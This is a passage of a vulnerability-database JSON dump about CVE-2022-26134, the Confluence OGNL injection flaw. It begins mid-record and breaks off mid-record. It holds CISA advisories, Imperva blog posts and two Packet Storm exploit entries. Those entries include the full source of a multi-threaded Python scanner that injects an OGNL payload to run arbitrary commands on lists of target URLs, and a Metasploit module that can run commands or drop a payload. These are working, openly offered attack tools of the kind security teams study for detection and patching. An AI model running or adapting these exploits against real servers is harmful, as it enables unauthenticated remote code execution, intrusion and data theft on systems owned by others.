vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "Atlassian has released a security advisory to address a remote code execution vulnerability (CVE-2022-26134) affecting Confluence Server and Data Center products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nThere are currently no updates available. Atlassian is working to issue an update. CISA strongly recommends that organizations review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for more information. CISA urges organizations with affected Atlassian\u2019s Confluence Server and Data Center products to block all internet traffic to and from those devices until an update is available and successfully applied.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Confluence Server and Data Center, CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:71FB648030101FA9B007125DFA636193", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa_kev", "title": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA-KEV-CVE-2022-26134", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-07-26T16:46:10", "description": "The **Cyber Defense Awards** in conjunction with [_Cyber Defense Magazine_](<https://www.cyberdefensemagazine.com/>) recently announced the winners of their prestigious annual **Global Infosec Awards for 2022**. We are proud to say that Imperva earned three [**Global Infosec Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>); as _Most Innovative_ for [Application Security](<https://www.imperva.com/products/application-security/>), _Cutting Edge_ for [Cloud Security](<https://www.imperva.com/solutions/securely-move-your-data-to-the-cloud/>), and as a _Market Leader_ for [Data Security](<https://www.imperva.com/products/data-security-fabric/>).\n\nToday, there are more than 4,000 (and counting) cybersecurity companies worldwide. Being singled out in such a crowded field, for three categories, brings enormous satisfaction to us at Imperva. [**Cyber Defense Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>) judges determined that only 10% of cybersecurity companies worldwide deserve these prestigious awards, making the multiple recognition that much more exciting.\n\nIt gives us great pleasure to see our accomplishments recognized and celebrated as winners by [**Cyber Defense Awards**](<https://cyberdefenseawards.com/>), now in their 9th year. It is even more gratifying to know that this renowned body of judges believes our unique people, software, hardware, and solutions can help users get one step ahead of the next cybersecurity threat.\n\nIn this post, we\u2019ll provide an overview of each of the award-winning solutions and offer some insight into why they stand head and shoulders above others in the respective peer groups.\n\n## Most Innovative: Imperva Application Security\n\nIn its most effective form, an [application security solution](<https://www.imperva.com/learn/application-security/application-security/>) protects software application code and data against cyber threats. To reach award-winning effectiveness levels, organizations must apply application security during all phases of development, including design, development, and deployment. It is not enough simply to acquire the solution, you must apply it intelligently through the software development lifecycle.\n\nImperva\u2019s [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) stops web application attacks that prevent important transactions and steal sensitive data, with near-zero false positives. Imperva also provides powerful [DDoS attack mitigation](<https://www.imperva.com/products/ddos-protection-services/>) and [advanced bad bot protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that has proven to be scalable as these types of attacks have become [dramatically larger and more sophisticated](<https://www.imperva.com/blog/shorter-sharper-ddos-attacks-are-on-the-rise-and-attackers-are-sidestepping-traditional-mitigation-approaches/>).\n\nImperva\u2019s Application Security solution has been judged particularly innovative because it also provides continuous [protection of all APIs](<https://www.imperva.com/products/api-security/>) using deep discovery and classification of sensitive data to detect all public, private and shadow APIs, and empowers security teams to implement a positive security model. The solution also offers [runtime protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) that protects applications from [zero-day vulnerabilities](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>), freeing up teams to focus on business logic, without leaving applications exposed to potential exploitation. Finally, the solution [prevents supply chain fraud](<https://www.imperva.com/products/client-side-protection/>) from client-side attacks like formjacking, digital skimming, and Magecart. These features enable users to deploy security at multiple layers and protect applications effectively against different types of attacks.\n\n## Cutting Edge: Cloud Security\n\nImperva's SaaS-based Cloud WAF solution is part of an overall edge platform, architected into a single cloud application security and delivery stack. Users benefit from the best website protection available. The solution delivers PCI-compliant, automated security that goes beyond [OWASP Top 10](<https://www.imperva.com/learn/application-security/owasp-top-10/>) coverage, with the comprehensiveness to reduce the risks that using third party code creates, plus integrated analytics.\n\n[Imperva\u2019s Cloud WAF](<https://www.imperva.com/resources/resource-library/datasheets/imperva-cloud-waf/>) operates as a secure reverse proxy in the cloud alongside our other security services, with our globally distributed content delivery network as its backbone. After a simple DNS change to route your traffic through the Imperva network, we\u2019re able to inspect each and every request sent to the millions of applications and IPs on our network and to filter out any kind of malicious activity at any point of presence (PoP) in our network.\n\nDifferent attack vectors require different mitigation capabilities, and Imperva has built cutting-edge capabilities purpose-built for every kind of attack vector, and proprietary client classification algorithms that enable us to maintain the most updated signature and IP reputation lists in the industry. At each layer of threat detection, managed with a single set of policies, all attacks are blocked at one time without failover. We pass each event on to our analytics for better insights and recommendations to further improve your security posture.\n\n## Market Leader: Data Security\n\nSince 2020, nearly all organizations with a digital presence have migrated workflows and data to cloud-based environments to develop and innovate faster and cheaper with a largely remote workforce. As more data architectures, both on-premises and cloud-native were added, the number of tools designed to manage data security became unmanageable. The resulting set of disparate tools was supposed to offer complete data security, but in practice did not.\n\n[Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>) is a holistic, collaborative, and flexible solution. It is not a data security platform, rather it is a fabric that enables what is called a \u201cconvergence of platforms\u201d where organizations can \u201crapidly amalgamate disparate data security capabilities\u201d to secure data more easily and effectively. No matter where a security threat originates, the volume of an attack, or the place where an attack is being waged, your data and the architectures you use are protected.\n\nAs a market leader, Imperva\u2019s Data Security Fabric provides coverage across multi-cloud, hybrid, and on-premises environments, protects all data sources and types, across structured, semi-structured, and unstructured, and integrates with ecosystem technologies for both incident context and additional data capabilities, unifying visibility, control, automation, and insights via a single data service or dashboard.\n\n## See what the buzz is about\n\nTo learn more about these award-winning solutions, click any of the links in the post. That said, we\u2019d much rather learn about your specific needs and challenges in cybersecurity and determine if we can help. [Contact us](<https://www.imperva.com/contact-us/>) and let\u2019s talk.\n\nThe post [Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022](<https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-26T13:16:19", "type": "impervablog", "title": "Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T13:16:19", "id": "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5", "href": "https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:03:56", "description": "_This is an evolving storyline. \n_**_Last update: June 4, 2022_****_._**\n\nOn June 2, 2022, [Atlassian published a security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) regarding a CVE for versions of Confluence Server and Data Center applications greater than 1.3.0. The advisory details a critical severity unauthenticated remote code execution vulnerability and is identified as [CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). This Object-Graph Navigation Language (OGNL) injection allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAtlassian has released a patch for CVE-2022-26134 and is recommending that all Confluence customers deploy this patch immediately to bring them up [to the latest long-term version available](<https://www.atlassian.com/software/confluence/download-archives>). To track the latest information on this vulnerability, Confluence customers are [advised to follow this Jira issue](<https://jira.atlassian.com/browse/CONFSERVER-79016>).\n\nImperva [Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), [WAF Gateway](<https://www.imperva.com/products/web-application-firewall-waf/>), and [Runtime Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) customers are fully protected from CVE-2022-26134 without requiring security rule changes. This protection was validated by the Imperva product team and Imperva Threat Research. \n\nFor Confluence users who haven\u2019t updated their software or cannot update to a long-term supported version at this time, Imperva offers a [free trial of Cloud WAF](<https://www.imperva.com/free-trial/>) that can be **quickly deployed** to protect vulnerable versions of Confluence. \n\n**Imperva Threat Research Analysis of CVE-2022-2613 \n**Since the disclosure, Imperva Threat Research monitored widespread scanning and attempted exploitation of this vulnerability. The uptick can be seen from our analysis below on the number of Java runtime injection attacks over the last 24 hours. \n\nWhat Imperva Threat Research has observed: \n\n\n * 680K attack attempts since June 3rd with attack sources coming from nearly 4k unique IPs. The largest percentage of targets are located in Chile. \n * Payload analysis shows that most of the attacks are scanning attempts to find vulnerable servers. We have identified two scanning approaches:\n * Invoking Java runtime exec function to run the command line program **_nslookup_** that calls an external server (owned by the attacker)\n * Invoking Confluence GeneralUtil **_setCookie_** function to set a unique cookie name and value\n * Imperva saw attempts to deploy a malicious script that operates in two stages:\n * Gains persistence through the modification of the infected server **_crontab_**\n * Downloads an executable file, runs it, and deletes the instance from the file\u2019s system. The malicious file\u2019s goal is to infect the victim server with the Mirai botnet. \n * Imperva Threat Research is seeing many attempts to exfiltrate sensitive data (e.g., dump of **/etc/passwd** file) \n\n\n**Try Imperva for Free \n**Protect your business from vulnerabilities like CVE-2022-26134 and others for free for 30 days. [Click here](<https://www.imperva.com/free-trial/>) to start your free trial today. \n\nThe post [Imperva Customers are protected from Atlassian Confluence CVE-2022-26134](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T22:05:24", "type": "impervablog", "title": "Imperva Customers are protected from Atlassian Confluence CVE-2022-26134", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2613", "CVE-2022-26134"], "modified": "2022-06-04T22:05:24", "id": "IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "href": "https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-06-07T16:53:40", "description": "", "cvss3": {}, "published": "2022-06-07T00:00:00", "type": "packetstorm", "title": "Confluence OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-07T00:00:00", "id": "PACKETSTORM:167430", "href": "https://packetstormsecurity.com/files/167430/Confluence-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python3 \n \n# Exploit Title: Confluence Pre-Auth Remote Code Execution via OGNL Injection \n# Google Dork: N/A \n# Date: 06/006/2022 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.4.17 versions before 7.18.1 \n# Tested on: - \n# CVE : CVE-2022-26134 \n# https://github.com/h3v0x/CVE-2022-26134 \n \nimport sys \nimport requests \nimport optparse \nimport multiprocessing \n \nfrom requests.packages import urllib3 \nfrom requests.exceptions import MissingSchema, InvalidURL \nurllib3.disable_warnings() \n \nrequestEngine = multiprocessing.Manager() \nsession = requests.Session() \n \nglobal paramResults \nparamResults = requestEngine.list() \nglobals().update(locals()) \n \ndef spiderXpl(url): \nglobals().update(locals()) \nif not url.startswith('http'): \nurl='http://'+url \n \nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\", \n\"Connection\": \"close\", \n\"Accept-Encoding\": \"gzip, deflate\"} \n \ntry: \nresponse = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False) \nif(response.status_code == 302): \nprint('Found: '+url+' // '+ response.headers['X-Cmd-Response']) \n \ninputBuffer = str(response.headers['X-Cmd-Response']) \nparamResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n') \nelse: \npass \n \nexcept requests.exceptions.ConnectionError: \nprint('[x] Failed to Connect: '+url) \npass \nexcept multiprocessing.log_to_stderr: \npass \nexcept KeyboardInterrupt: \nprint('[!] Stoping exploit...') \nexit(0) \nexcept (MissingSchema, InvalidURL): \npass \n \n \ndef banner(): \nprint('[-] CVE-2022-26134') \nprint('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n') \n \n \ndef main(): \nbanner() \n \nglobals().update(locals()) \n \nsys.setrecursionlimit(100000) \n \nif not optionsOpt.filehosts: \nurl = optionsOpt.url \nspiderXpl(url) \nelse: \nf = open(optionsOpt.filehosts) \nurls = map(str.strip, f.readlines()) \n \nmultiReq = multiprocessing.Pool(optionsOpt.threads_set) \ntry: \nmultiReq.map(spiderXpl, urls) \nmultiReq.close() \nmultiReq.join() \nexcept UnboundLocalError: \npass \nexcept KeyboardInterrupt: \nexit(0) \n \n \nif optionsOpt.output: \nprint(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output) \n \nwith open(optionsOpt.output, \"w\") as f: \nfor result in paramResults: \nf.write(\"%s\\n\" % result) \nf.close() \n \nif __name__ == \"__main__\": \nparser = optparse.OptionParser() \n \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)') \nparser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt') \nparser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10) \nparser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8) \nparser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt') \nparser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id') \noptionsOpt, args = parser.parse_args() \n \nmain() \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167430/CVE-2022-26134.py.txt"}, {"lastseen": "2022-06-08T16:37:11", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence Namespace OGNL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-08T00:00:00", "id": "PACKETSTORM:167449", "href": "https://packetstormsecurity.com/files/167449/Atlassian-Confluence-Namespace-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence Namespace OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to \nevaluate an OGNL expression resulting in OS command execution. \n}, \n'Author' => [ \n'Unknown', # exploited in the wild \n'bturner-r7', \n'jbaines-r7', \n'Spencer McIntyre' \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'], \n['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'], \n['URL', 'https://github.com/jbaines-r7/through_the_wire'], \n['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis'] \n], \n'DisclosureDate' => '2022-06-02', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :dropper \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8090 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nversion = get_confluence_version \nreturn CheckCode::Unknown unless version \n \nvprint_status(\"Detected Confluence version: #{version}\") \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl('', header: header) # empty command works for testing, the header will be set \n \nreturn CheckCode::Unknown unless res \n \nunless res && res.headers.include?(header) \nreturn CheckCode::Safe('Failed to test OGNL injection.') \nend \n \nCheckCode::Vulnerable('Successfully tested OGNL injection.') \nend \n \ndef get_confluence_version \nreturn @confluence_version if @confluence_version \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login.action') \n) \nreturn nil unless res&.code == 200 \n \npoweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text \nreturn nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/ \n \n@confluence_version = Rex::Version.new(Regexp.last_match(1)) \n@confluence_version \nend \n \ndef exploit \nprint_status(\"Executing #{payload_instance.refname} (#{target.name})\") \n \ncase target['Type'] \nwhen :cmd \nexecute_command(payload.encoded) \nwhen :dropper \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nheader = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\" \nres = inject_ognl(cmd, header: header) \n \nunless res && res.headers.include?(header) \nfail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\") \nend \n \nvprint_good(\"Successfully executed command: #{cmd}\") \nres.headers[header] \nend \n \ndef inject_ognl(cmd, header:) \nsend_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'), \n'headers' => { header => cmd } \n) \nend \n \ndef ognl_payload(_cmd, header:) \n<<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '') \n${ \nClass.forName(\"com.opensymphony.webwork.ServletActionContext\") \n.getMethod(\"getResponse\",null) \n.invoke(null,null) \n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}], "cve": [{"lastseen": "2022-06-30T10:42:46", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 